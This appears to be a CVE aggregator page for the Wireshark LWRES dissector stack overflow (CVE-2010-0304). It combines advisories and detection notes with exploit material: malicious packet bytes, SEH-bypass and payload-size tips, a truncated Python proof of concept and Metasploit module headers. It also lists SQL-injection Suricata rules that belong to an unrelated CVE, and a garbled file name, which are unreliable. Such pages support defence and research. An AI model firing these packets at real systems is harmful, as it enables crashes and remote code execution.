CVE-2010-0304
published 2010-02-03CVE-2010-0304: Multiple buffer overflows in the LWRES dissector in Wireshark 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allow remote attackers to cause a denial of service…
PriorityP264high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
73.67%
99.4th percentile
Multiple buffer overflows in the LWRES dissector in Wireshark 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allow remote attackers to cause a denial of service (crash) via a malformed packet, as demonstrated using a stack-based buffer overflow to the dissect_getaddrsbyname_request function.
Affected
25 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | wireshark | < wireshark 1.2.6-1 (bookworm) | wireshark 1.2.6-1 (bookworm) |
| wireshark | wireshark | — | — |
| wireshark | wireshark | — | — |
| wireshark | wireshark | — | — |
| wireshark | wireshark | — | — |
| wireshark | wireshark | — | — |
| wireshark | wireshark | — | — |
| wireshark | wireshark | — | — |
| wireshark | wireshark | — | — |
| wireshark | wireshark | — | — |
| wireshark | wireshark | — | — |
| wireshark | wireshark | — | — |
| wireshark | wireshark | — | — |
| wireshark | wireshark | — | — |
| wireshark | wireshark | — | — |
| wireshark | wireshark | — | — |
| wireshark | wireshark | — | — |
| wireshark | wireshark | — | — |
| wireshark | wireshark | — | — |
| wireshark | wireshark | — | — |
| wireshark | wireshark | — | — |
| wireshark | wireshark | >= 0 < 1.2.6-1 | 1.2.6-1 |
| wireshark | wireshark | >= 0 < 1.2.6-1 | 1.2.6-1 |
| wireshark | wireshark | >= 0 < 1.2.6-1 | 1.2.6-1 |
| wireshark | wireshark | >= 0 < 1.2.6-1 | 1.2.6-1 |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x00\x00\x01\x5d\x00\x00\x00\x00\x4b\x49\x1c\x52\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01
bytes↗
\x00\x00\x01\x5d\x00\x00\x00\x00\x4b\x49\x1c\x52\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 [len 2 bytes] [payload] \x00\x00
- →The exploit targets UDP port 921 (LWRES default port). Monitor for oversized or malformed UDP datagrams to port 921 with the magic header bytes \x00\x00\x01\x5d. ↗
- →The malicious LWRES packet begins with a fixed 36-byte header starting with \x00\x00\x01\x5d\x00\x00\x00\x00\x4b\x49\x1c\x52\x00\x01\x00\x01. Detect this byte pattern in UDP payloads on port 921. ↗
- →The loop variant of the exploit sends the malicious packet to the multicast address 239.255.255.250 on UDP/921 repeatedly. Monitor for LWRES traffic to this multicast destination. ↗
- →The vulnerable code path is only triggered when Wireshark/tshark renders the packet dissection. Fragmented packets must be fully reassembled before the overflow fires — look for UDP fragment reassembly of LWRES traffic. ↗
- →On Windows targets, the exploit uses an SEH overwrite bypass (not a direct return address overwrite) due to /GS stack cookie protection. A payload length of ~2128 bytes is used for the Windows SEH target. ↗
- →The overflow occurs in dissect_getaddrsbyname_request inside packet-lwres.c. The name-length field in the LWRES request is attacker-controlled and used to copy into a fixed stack buffer without bounds checking. ↗
- ·The exploit default target (loop variant) is set to target index 4 (Windows x86), not Linux. Adjust target selection accordingly when testing. ↗
- ·Null bytes (\x00) are bad characters for the payload; the exploit cannot deliver shellcode containing null bytes. ↗
- ·The Windows SEH exploit packet is large enough to be fragmented over UDP, which may cause additional complications and reduce reliability. ↗
- ·The payload space is limited to 512 bytes; NOP sleds and large stagers may not fit. ↗
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv7.5HIGH
vendor_debian7.5HIGH
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
wireshark: crash in LWRES dissector
vendor_redhat·2010-01-27·CVSS 7.5
CVE-2010-0304 [HIGH] wireshark: crash in LWRES dissector
wireshark: crash in LWRES dissector
Multiple buffer overflows in the LWRES dissector in Wireshark 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allow remote attackers to cause a denial of service (crash) via a malformed packet, as demonstrated using a stack-based buffer overflow to the dissect_getaddrsbyname_request function.
Debian
CVE-2010-0304: wireshark - Multiple buffer overflows in the LWRES dissector in Wireshark 0.9.15 through 1.0...
vendor_debian·2010·CVSS 7.5
CVE-2010-0304 [HIGH] CVE-2010-0304: wireshark - Multiple buffer overflows in the LWRES dissector in Wireshark 0.9.15 through 1.0...
Multiple buffer overflows in the LWRES dissector in Wireshark 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allow remote attackers to cause a denial of service (crash) via a malformed packet, as demonstrated using a stack-based buffer overflow to the dissect_getaddrsbyname_request function.
Scope: local
bookworm: resolved (fixed in 1.2.6-1)
bullseye: resolved (fixed in 1.2.6-1)
forky: resolved (fixed in 1.2.6-1)
sid: resolved (fixed in 1.2.6-1)
trixie: resolved (fixed in 1.2.6-1)
VulDB
Wireshark up to 1.2.5 overflow.ck dissect_getaddrsbyname_request memory corruption (EDB-16289 / Nessus ID 44429)
vuldb·2026-04-30·CVSS 7.5
CVE-2010-0304 [HIGH] Wireshark up to 1.2.5 overflow.ck dissect_getaddrsbyname_request memory corruption (EDB-16289 / Nessus ID 44429)
A vulnerability labeled as critical has been found in Wireshark. This issue affects the function dissect_getaddrsbyname_request of the file overflow.ck. The manipulation results in memory corruption.
This vulnerability is identified as CVE-2010-0304. The attack can be executed remotely. Additionally, an exploit exists.
The affected component should be upgraded.
GHSA
GHSA-jpr3-gg36-wv7f: Multiple buffer overflows in the LWRES dissector in Wireshark 0
ghsa_unreviewed·2022-05-02
CVE-2010-0304 [HIGH] CWE-119 GHSA-jpr3-gg36-wv7f: Multiple buffer overflows in the LWRES dissector in Wireshark 0
Multiple buffer overflows in the LWRES dissector in Wireshark 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allow remote attackers to cause a denial of service (crash) via a malformed packet, as demonstrated using a stack-based buffer overflow to the dissect_getaddrsbyname_request function.
OSV
CVE-2010-0304: Multiple buffer overflows in the LWRES dissector in Wireshark 0
osv·2010-02-03·CVSS 7.5
CVE-2010-0304 [HIGH] CVE-2010-0304: Multiple buffer overflows in the LWRES dissector in Wireshark 0
Multiple buffer overflows in the LWRES dissector in Wireshark 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allow remote attackers to cause a denial of service (crash) via a malformed packet, as demonstrated using a stack-based buffer overflow to the dissect_getaddrsbyname_request function.
Suricata
ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id UNION SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-0304 [HIGH] ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id UNION SELECT
ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id UNION SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id UNION SELECT"; flow:established,to_server; http.uri; content:"/duyuru.asp?"; nocase; content:"id="; nocase; content:"UNION"; nocase; pcre:"/UNION\s+SELECT/i"; reference:cve,CVE-2007-0304; reference:url,www.milw0rm.com/exploits/3120; classtype:web-application-attack; sid:2005604; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_03, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_techn
Suricata
ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id ASCII
suricata·2010-07-30·CVSS 7.5
CVE-2007-0304 [HIGH] ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id ASCII
ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id ASCII"; flow:established,to_server; http.uri; content:"/duyuru.asp?"; nocase; content:"id="; nocase; content:"SELECT"; nocase; pcre:"/ASCII\(.+SELECT/i"; reference:cve,CVE-2007-0304; reference:url,www.milw0rm.com/exploits/3120; classtype:web-application-attack; sid:2005607; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_03, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T119
Suricata
ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id UPDATE
suricata·2010-07-30·CVSS 7.5
CVE-2007-0304 [HIGH] ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id UPDATE
ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id UPDATE"; flow:established,to_server; http.uri; content:"/duyuru.asp?"; nocase; content:"id="; nocase; content:"UPDATE"; nocase; pcre:"/UPDATE.+SET/i"; reference:cve,CVE-2007-0304; reference:url,www.milw0rm.com/exploits/3120; classtype:web-application-attack; sid:2005608; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_03, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190,
Suricata
ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-0304 [HIGH] ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id SELECT
ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id SELECT"; flow:established,to_server; http.uri; content:"/duyuru.asp?"; nocase; content:"id="; nocase; content:"SELECT"; nocase; pcre:"/SELECT.+FROM/i"; reference:cve,CVE-2007-0304; reference:url,www.milw0rm.com/exploits/3120; classtype:web-application-attack; sid:2005603; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_03, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190
Suricata
ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id INSERT
suricata·2010-07-30·CVSS 7.5
CVE-2007-0304 [HIGH] ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id INSERT
ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id INSERT"; flow:established,to_server; http.uri; content:"/duyuru.asp?"; nocase; content:"id="; nocase; content:"INSERT"; nocase; pcre:"/INSERT.+INTO/i"; reference:cve,CVE-2007-0304; reference:url,www.milw0rm.com/exploits/3120; classtype:web-application-attack; sid:2005605; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_03, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190
Suricata
ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id DELETE
suricata·2010-07-30·CVSS 7.5
CVE-2007-0304 [HIGH] ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id DELETE
ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id DELETE"; flow:established,to_server; http.uri; content:"/duyuru.asp?"; nocase; content:"id="; nocase; content:"DELETE"; nocase; pcre:"/DELETE.+FROM/i"; reference:cve,CVE-2007-0304; reference:url,www.milw0rm.com/exploits/3120; classtype:web-application-attack; sid:2005606; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_03, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190
Exploit-DB
Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Loop) (Metasploit)
exploitdb·2010-11-24
CVE-2010-0304 Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Loop) (Metasploit)
Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Loop) (Metasploit)
---
##
# $Id: wireshark_lwres_getaddrbyname_loop.rb 11126 2010-11-24 19:25:18Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'racket'
class Metasploit3 'Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)',
'Description' => %q{
The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through
1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer
overflow. This bug found and reported by babi.
Exploit-DB
Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Metasploit)
exploitdb·2010-02-11
CVE-2010-0304 Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Metasploit)
Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Metasploit)
---
##
# $Id: wireshark_lwres_getaddrbyname.rb 8454 2010-02-11 09:03:48Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'racket'
class Metasploit3 'Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow',
'Description' => %q{
The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through
1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer
overflow. This bug found and reported by babi.
This particular ex
Exploit-DB
Wireshark 1.2.5 - 'LWRES getaddrbyname' Stack Buffer Overflow (PoC)
exploitdb·2010-01-29
CVE-2010-0304 Wireshark 1.2.5 - 'LWRES getaddrbyname' Stack Buffer Overflow (PoC)
Wireshark 1.2.5 - 'LWRES getaddrbyname' Stack Buffer Overflow (PoC)
---
#!/usr/bin/env python
# Wireshark 1.2.5 LWRES getaddrbyname stack-based buffer overflow PoC
# with control over EIP on Debian 5.0.3
# by babi on 29 Jan 2010
# get it at http://www.wireshark.org/download/src/all-versions/wireshark-1.2.5.tar.gz
import socket, sys
try:
host = sys.argv[1]
except:
print "usage: " + sys.argv[0] + " "
exit(2)
port = 921
addr = (host, port)
leng = 380
high = int(leng / 256)
low = leng & 255
data = "\x00\x00\x01\x5d\x00\x00\x00\x00\x4b\x49\x1c\x52\x00\x01\x00\x01"
data += "\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00"
data += "\x00\x00\x00\x01"
data += chr(high) + chr(low) + ("B" * leng) + "\x00\x00"
udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
udps.
Metasploit
Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
metasploit
Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer overflow. This bug found and reported by babi. This particular exploit targets the dissect_getaddrsbyname_request function. Several other functions also contain potentially exploitable stack-based buffer overflows. The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents exploitation via the return address on the stack. Sending a larger string allows exploitation using the SEH bypass method. However, this packet will usually get fragmented, which may cause additional complications. NOTE: The vulnerable code is reached only when the packet diss
Metasploit
Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)
metasploit
Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)
Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)
The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer overflow. This bug found and reported by babi. This particular exploit targets the dissect_getaddrsbyname_request function. Several other functions also contain potentially exploitable stack-based buffer overflows. The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents exploitation via the return address on the stack. Sending a larger string allows exploitation using the SEH bypass method. However, this packet will usually get fragmented, which may cause additional complications. NOTE: The vulnerable code is reached only when the pack
http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=hhttp://lists.fedoraproject.org/pipermail/package-announce/2010-March/036415.htmlhttp://osvdb.org/61987http://secunia.com/advisories/38257http://secunia.com/advisories/38348http://secunia.com/advisories/38829http://www.debian.org/security/2010/dsa-1983http://www.mandriva.com/security/advisories?name=MDVSA-2010:031http://www.metasploit.com/modules/exploit/multi/misc/wireshark_lwres_getaddrbynamehttp://www.openwall.com/lists/oss-security/2010/01/29/4http://www.securityfocus.com/bid/37985http://www.securitytracker.com/id?1023516http://www.vupen.com/english/advisories/2010/0239http://www.wireshark.org/security/wnpa-sec-2010-01.htmlhttp://www.wireshark.org/security/wnpa-sec-2010-02.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/55951https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8490https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9933http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=hhttp://lists.fedoraproject.org/pipermail/package-announce/2010-March/036415.htmlhttp://osvdb.org/61987http://secunia.com/advisories/38257http://secunia.com/advisories/38348http://secunia.com/advisories/38829http://www.debian.org/security/2010/dsa-1983http://www.mandriva.com/security/advisories?name=MDVSA-2010:031http://www.metasploit.com/modules/exploit/multi/misc/wireshark_lwres_getaddrbynamehttp://www.openwall.com/lists/oss-security/2010/01/29/4http://www.securityfocus.com/bid/37985http://www.securitytracker.com/id?1023516http://www.vupen.com/english/advisories/2010/0239http://www.wireshark.org/security/wnpa-sec-2010-01.htmlhttp://www.wireshark.org/security/wnpa-sec-2010-02.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/55951https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8490https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9933
2010-02-03
Published